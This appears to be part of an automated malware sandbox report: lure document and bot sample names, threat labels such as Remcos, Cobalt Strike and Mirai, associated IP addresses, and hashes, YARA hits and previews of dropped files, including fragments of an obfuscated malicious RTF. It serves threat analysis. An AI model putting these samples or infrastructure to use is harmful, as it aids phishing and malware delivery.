AS-COLOCROSSINGUS | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 107.172.44.175
AS-COLOCROSSINGUS | sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 104.168.46.26
AS-COLOCROSSINGUS | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 198.46.178.192
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher
  • 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Inquiry.js | malicious | Unknown
  • 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | pbnpvwfhco.elf | malicious | Unknown
  • 141.36.226.152
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | mipsel.nn.elf | malicious | Mirai, Okiru
  • 141.46.25.133
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | sh4.nn.elf | malicious | Mirai, Okiru
  • 134.100.186.144
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | arm5.nn.elf | malicious | Mirai, Okiru
  • 134.28.58.216
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | arm.nn.elf | malicious | Mirai, Okiru
  • 141.65.115.68
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | x86_64.nn.elf | malicious | Mirai, Okiru
  • 141.51.102.5
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | arm5.nn.elf | malicious | Mirai, Okiru
  • 141.48.190.154
ENTELCHILESACL | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 152.231.102.107
ENTELCHILESACL | jmggnxeedy.elf | malicious | Unknown
  • 11.100.2.34
ENTELCHILESACL | akcqrfutuo.elf | malicious | Unknown
  • 11.120.114.146
ENTELCHILESACL | arm.nn.elf | malicious | Mirai, Okiru
  • 11.113.3.48
ENTELCHILESACL | x86.elf | malicious | Unknown
  • 186.10.181.57
ENTELCHILESACL | nabmpsl.elf | malicious | Unknown
  • 11.112.79.218
ENTELCHILESACL | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 152.231.102.107
ENTELCHILESACL | la.bot.mips.elf | malicious | Unknown
  • 11.99.146.111
ENTELCHILESACL | la.bot.mipsel.elf | malicious | Unknown
  • 11.126.50.37
ENTELCHILESACL | la.bot.sparc.elf | malicious | Unknown
  • 11.99.66.51
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | Document.exe | malicious | MassLogger RAT
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | gr5zS9wytq.bat | malicious | Unknown
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | FHG538JGH835DG86S.doc | malicious | DarkTortilla, XWorm
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION.xls | malicious | HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | Payment Advice.xls | malicious | Remcos, HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
05af1f5ca1b87cc9cc9b25185115607d | Order Summary.xls | malicious | Remcos, HTMLPhisher
  • 193.30.119.205
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | container payment.xls | malicious | Unknown
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | QUOTATION.xls | malicious | HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | Payment Advice.xls | malicious | Remcos, HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | Order Summary.xls | malicious | Remcos, HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | OC25-11-24.xls | malicious | Remcos, HTMLPhisher
  • 152.231.102.107
7dcce5b76c8b17472d024758970a406b | Shipping Document.xls | malicious | HTMLPhisher
  • 152.231.102.107
                                                                      No context
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025553961890493235
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPc/Ak8RvxggLR5iVg1CFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPqbcdie1CbvYg3J/
                                                                      MD5:4F228FAB144AB07980CB7687D2850220
                                                                      SHA1:18A685A3D7DD1029075164F93F1C02780FB3076E
                                                                      SHA-256:73D1F239795965E1AE01CB0B30CF0ED47C18EEF3D07D46339A412BE8F71000B1
                                                                      SHA-512:FDA7B0636B012387650A963D60D10982F30D9A83159D25F67CC76F877D4D51F86D9DEC58BBABE64A1443317DA6487CE40EABC715B39DA8C002D742F7A3563542
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:......M.eFy...z.J....>C....).S,...X.F...Fa.q............................3.(...I..0)..qF........+..;.G.C...K6.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4760
                                                                      Entropy (8bit):4.834060479684549
                                                                      Encrypted:false
                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):249980
                                                                      Entropy (8bit):2.3598396912578936
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YwENs3iItNrGpMmDD2EnD7744ARcEjlCcAizk1PhrGkZErF:lEa3JNSH2FR3vnYFFGcqF
                                                                      MD5:29D663B176F3D88812FD891D1D3EFA0F
                                                                      SHA1:600BD3E6CB7600CFC5A6752F2F537CA02E28564A
                                                                      SHA-256:81D875A8215C97BF39E091D2F6D553B6E0094DCB619DE16F2D86634AFDFAF2F9
                                                                      SHA-512:346AAF88242EE7F56D4D0869D1C2B980642C53D3B3309FDCF101763E2CDA740F652C4EEEF1670CD9EE6DB699EFF0C5494C3B7FAEAA992FD512EBFAB930CA443D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1...{\*\pnaiud603980834 \.}.{\4979101970(.*2%>^55-/_?7.!+%>4;2.%3;/1?@|9;.7?;^1[<[=0^%+*?(_?&|31#*5_7?`.@?)!7$`80?%=0.74(.?')%0.?-/'?9,#3*-%)+:7%|0.]0-?[?,=)?->:8/)_<5`(@-^:#9$??520*]+/?8~7(.%57@-7`0&6^!;<`#8;?*1/$3.#(^7;_:/@=???2,)%&>.:^%.-..!%*/2=6!*4/);>>)%+^:?^4]._2>8@(78$%?(:80?+8?:2~]:%4<@59`*./=]1%:,955?&72?&?/]#47<%@?1=~_.?%:+:&49~#5!+@_??/!?<,$`8?.)?[`(?|5/??4>=+8,%^[`-.`*?&^7|>*-`^9'?791?^`?'.|2.~6+:,)4??(<51-7.^.23|+0:7^&;`0(#&?^@'=1^?@?!%<>554*:~@+1;4$%:;,;_?.0*%-+|[=%-..?&&$?>=_]0.>.9,?,..(=@3??$;`9?[>?7,8&=5)]`=.8_$~059|3.%&+.#3:&;01??%#9..<2#<4?8?=:/%%$4%/`(,5:;`-????~]03=?%180>(~8|?8'#?.?~,@;?~??`)!,`3]_!#3'`..)%!~<?(3.@^>7?&(*18*%0![0%?(<*?:.734._8@]$<@6;?1%0-@.<..!2|.>.?~?'08<5%..-.241'&.$$&6!'+)74-@;4%%`/-!.;.%=0>=^$08?$(;4.;%=0|'./3*!2??:7'#4?.?%6`)6&|7?._?5$;;[.;[$_#.+(.49;?#<.+`>5+$?.%.1%*??4@3<'(@248.??!$5??9@?'5-??@^<8(.'],[`@8?72*?1;;&`/:?*;)._44~~>-)[~9|6^7>[?%1783^+<)_?$?/,=^[[%?|&4#|-#^.1?5%3&%?(?^;:?-1#?1.$+6]%#0?.,6?`.($82*.?]#3!.[&89,4`::@9:]_1!.%'_%
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):164934
                                                                      Entropy (8bit):3.909751863320666
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tfSbgch/i6M5Cde7vL5vyaGuBfSbgch/i6M5Cde7vL5gfSbgch/i6M5Cde7vL51:tfSbjhZdQL5tfSbjhZdQL5gfSbjhZdQf
                                                                      MD5:B9765F41CF6B094C309E61D92530447F
                                                                      SHA1:A708DD6C737B06BF842D7933AAC106BB97AA60D3
                                                                      SHA-256:1168E97D0CCBC4A68C3BFA7C420D9BBDB2D985B225109E9FF6D4558AA0BE2BB5
                                                                      SHA-512:8AA37821D21CA75EB4F721A3285417C798597DDAD958A5AB620A3EF2A3968433BB6CF91F2E237CEEADB0C55AC9EDA87CA60D7F203074768F82CDDF25F4226192
                                                                      Malicious:false
                                                                      Preview:..........W.L.L.P.Q.B.K.Z.R.f.U.W.L.R.k. .=. .".O.J.e.z.u.W.z.x.L.i.z.b.h.N.a.".....W.r.L.W.G.e.K.c.q.f.l.u.K.t.x. .=. .".W.W.k.p.K.p.A.L.i.i.u.d.G.e.W.".....z.K.T.k.K.i.l.h.O.t.p.l.e.R.A. .=. .".U.G.G.t.K.s.N.i.G.x.u.L.B.W.I.".....i.h.e.n.l.c.e.K.L.L.L.h.j.A.v. .=. .".s.W.L.q.i.c.L.C.K.P.G.P.N.i.n.".....L.p.c.L.h.C.m.n.b.W.K.P.L.L.K. .=. .".I.K.n.p.K.f.L.m.N.u.f.L.r.f.B.".....B.U.p.z.W.W.N.z.p.d.W.L.U.P.L. .=. .".G.L.f.L.l.d.N.a.L.Z.G.l.U.L.d.".........i.K.U.O.C.j.K.o.K.L.b.e.p.K.L. .=. .".p.L.W.W.o.G.J.i.x.S.u.U.G.n.P.".....z.m.z.e.O.G.c.R.c.h.A.x.B.m.t. .=. .".f.Z.B.d.c.L.O.n.n.i.o.c.z.a.G.".....c.W.W.t.U.C.a.I.k.U.i.f.K.A.W. .=. .".f.p.k.L.h.W.Z.h.S.P.K.i.O.K.b.".........i.K.s.L.U.e.n.m.i.k.C.i.A.h.U. .=. .".B.Z.x.k.T.G.U.T.e.S.W.i.H.f.T.".....f.B.O.i.u.b.B.K.c.t.B.G.c.U.L. .=. .".P.T.f.A.i.N.l.Z.h.N.A.T.U.g.A.".....P.b.q.O.u.p.a.z.K.K.Z.A.K.Z.r. .=. .".h.u.L.l.k.l.W.G.S.L.W.A.Z.a.J.".....K.o.q.N.c.c.j.m.l.U.Z.S.k.K.B. .=. .".U.G.Z.W.u.K.b.o.o.O.c.W.Z.e.r.".....U.a.b.k.K.z.c.L.U.Z.
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):43456
                                                                      Entropy (8bit):3.124030869325278
                                                                      Encrypted:false
                                                                      SSDEEP:384:Lajiu/9hWrI9KovPayXN76Reo8pPgjiD6s3iKJ:LaF/zr95P7lrF8iB1J
                                                                      MD5:195C2D5D988E9E0E930FC2E614569D6B
                                                                      SHA1:5380B18C1265183540A2BCF804B2241DD52F9EB2
                                                                      SHA-256:209E4FB0ACD84B7C0FC1931D910EE64634D3D7E119E598CDB0044F4D7525A38F
                                                                      SHA-512:6912C8E3350D322F204AECFED0770D64C5A6DE1172338E2D38BFD4D4257F38BB3C1AAF361EF2F024AE0AD38DD308ED2F3AB906A0505130D092C410912AAAF4DA
                                                                      Malicious:false
                                                                      Preview:....l...........;...............~@..xW.. EMF................................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........X.......`.......................X.......X.......`.......7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................`..+.@..........p.......h.......p.......................h.......h.......p.......7......................@.N..............C.a.l.i.b.r.i...........
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):3350324
                                                                      Entropy (8bit):1.7377088769624822
                                                                      Encrypted:false
                                                                      SSDEEP:12288:46vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgCv:RODhqH8
                                                                      MD5:A32BE3562AF3F7E24B8C4297AC5DC5C8
                                                                      SHA1:43909958A286BA100A50825B4B3C4DC714A71287
                                                                      SHA-256:363604FC6EAB3CAAB3F274695D071FB0797EB05D900AF8D565D6D2BFFED27DCD
                                                                      SHA-512:9EE56BC51BAEFD3A2B033D30E8BB4BE10DF87889D3AF05CC2ED3755BBFA0871E157E322B39A95AB25D2C5EFD81C68F7B0189A469E64680B525845D2388428848
                                                                      Malicious:false
                                                                      Preview:....l...........0................]...?.. EMF....4.3.`.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................L...d...............A...............*...!..............?...........?................................'.......................%...........(.......................L...d...........)...A...........V...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):3350324
                                                                      Entropy (8bit):1.7377088769624822
                                                                      Encrypted:false
                                                                      SSDEEP:12288:46vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgCv:RODhqH8
                                                                      MD5:A32BE3562AF3F7E24B8C4297AC5DC5C8
                                                                      SHA1:43909958A286BA100A50825B4B3C4DC714A71287
                                                                      SHA-256:363604FC6EAB3CAAB3F274695D071FB0797EB05D900AF8D565D6D2BFFED27DCD
                                                                      SHA-512:9EE56BC51BAEFD3A2B033D30E8BB4BE10DF87889D3AF05CC2ED3755BBFA0871E157E322B39A95AB25D2C5EFD81C68F7B0189A469E64680B525845D2388428848
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):249980
                                                                      Entropy (8bit):2.3598396912578936
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YwENs3iItNrGpMmDD2EnD7744ARcEjlCcAizk1PhrGkZErF:lEa3JNSH2FR3vnYFFGcqF
                                                                      MD5:29D663B176F3D88812FD891D1D3EFA0F
                                                                      SHA1:600BD3E6CB7600CFC5A6752F2F537CA02E28564A
                                                                      SHA-256:81D875A8215C97BF39E091D2F6D553B6E0094DCB619DE16F2D86634AFDFAF2F9
                                                                      SHA-512:346AAF88242EE7F56D4D0869D1C2B980642C53D3B3309FDCF101763E2CDA740F652C4EEEF1670CD9EE6DB699EFF0C5494C3B7FAEAA992FD512EBFAB930CA443D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):2.8678599643075064
                                                                      Encrypted:false
                                                                      SSDEEP:96:3gUkuvpInM3IxUuZQ7q+TCu0pJnr3IxUuZQ7q+T:3gwpInpxeOcWpJncxeOc
                                                                      MD5:A6FC110C1C032C8B184A58C57278A9F6
                                                                      SHA1:DA5D2A375A01AD5BEF5765664D2078521BEA807D
                                                                      SHA-256:8264F693DC14E8C67A5205DB736A967115F98EE7A8663ECA0C1C2CDF414FEAB8
                                                                      SHA-512:D22F022BADD6A8B543F13AC0827E686A08506DB34AF62CAC63A334D4747195912333BB3003B7E60068993EDA86A5E4EC41F521844D5D0D552D347BE78659B422
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11776
                                                                      Entropy (8bit):3.555243369255073
                                                                      Encrypted:false
                                                                      SSDEEP:192:11qgwJBcF3/y/MA8VDdO4hPUHLMLBKaCz6vUfrmzd+9l3p19t4RG12RYhAMh69sH:1Ya9/ypwc4hPuLMLJCzzfr3hug1BhAMV
                                                                      MD5:21F8821C518E42CF6DFF12BC481CE6F9
                                                                      SHA1:4F5E4C121E042D2BFD5159AFD0D7550CF4A1F2F4
                                                                      SHA-256:B39010B16D33566DFFEC9ADA8317F3F086D7288E269F811D127C5137F1AE6301
                                                                      SHA-512:1263E7540234069FC612C482C76CB2E7D5EF06F4E2327F6B22A8CB629EBE2F305DF02B17B1C5188EBA1F7D47F4825B66A6B044071A57E9D861BE3B3B1DDEECA7
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.02566653274851145
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPclSO9vxggLR0Yh/lSpRXv//4tfnRujlw//+GtluJ/eRuj:I3DP+S8QG/wHvYg3J/
                                                                      MD5:BFD4DBC1B936D7F58B866390F0D2A870
                                                                      SHA1:4D11AC74EAF10A833F5062A381FAEEE53FFC98E3
                                                                      SHA-256:32DCE03C3A40189949A38C2DD2CE0AE6E92404A59F60A9264E3AB1D8FFC4EF17
                                                                      SHA-512:9EB04ADDFBCA50EE96F611079F8650A160F62F33BC6C511C6ECEA374296B0FF8F2D580D291E499AC5A53DC6F579D6A710C9FD27CD2E223EF44A016178555253A
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025553961890493235
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPc/Ak8RvxggLR5iVg1CFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPqbcdie1CbvYg3J/
                                                                      MD5:4F228FAB144AB07980CB7687D2850220
                                                                      SHA1:18A685A3D7DD1029075164F93F1C02780FB3076E
                                                                      SHA-256:73D1F239795965E1AE01CB0B30CF0ED47C18EEF3D07D46339A412BE8F71000B1
                                                                      SHA-512:FDA7B0636B012387650A963D60D10982F30D9A83159D25F67CC76F877D4D51F86D9DEC58BBABE64A1443317DA6487CE40EABC715B39DA8C002D742F7A3563542
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.8176852288027371
                                                                      Encrypted:false
                                                                      SSDEEP:48:5InAeP0iusLEJpW1BmY7cGu0FxguGFzg7:5HyVuoEWP/gGukGuG9g7
                                                                      MD5:BF1F69E3A35062BDFDC0860EC074A018
                                                                      SHA1:0163643293CB419D7F6A7A7CA22B5A7874AD8E70
                                                                      SHA-256:83068823443F422442FF025437FAED906ED556AB2D4293D9678710DF0AC41C4A
                                                                      SHA-512:9794AF9033D8BF855B794D13019CC523532AE383D99A857095972C6926FAD881E89BF7E61AE9C57D7EDA6AAC51FD9E048F254757E4B1A30E46B14380D442B1A8
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Generic INItialization configuration [xls]
                                                                      Category:modified
                                                                      Size (bytes):88
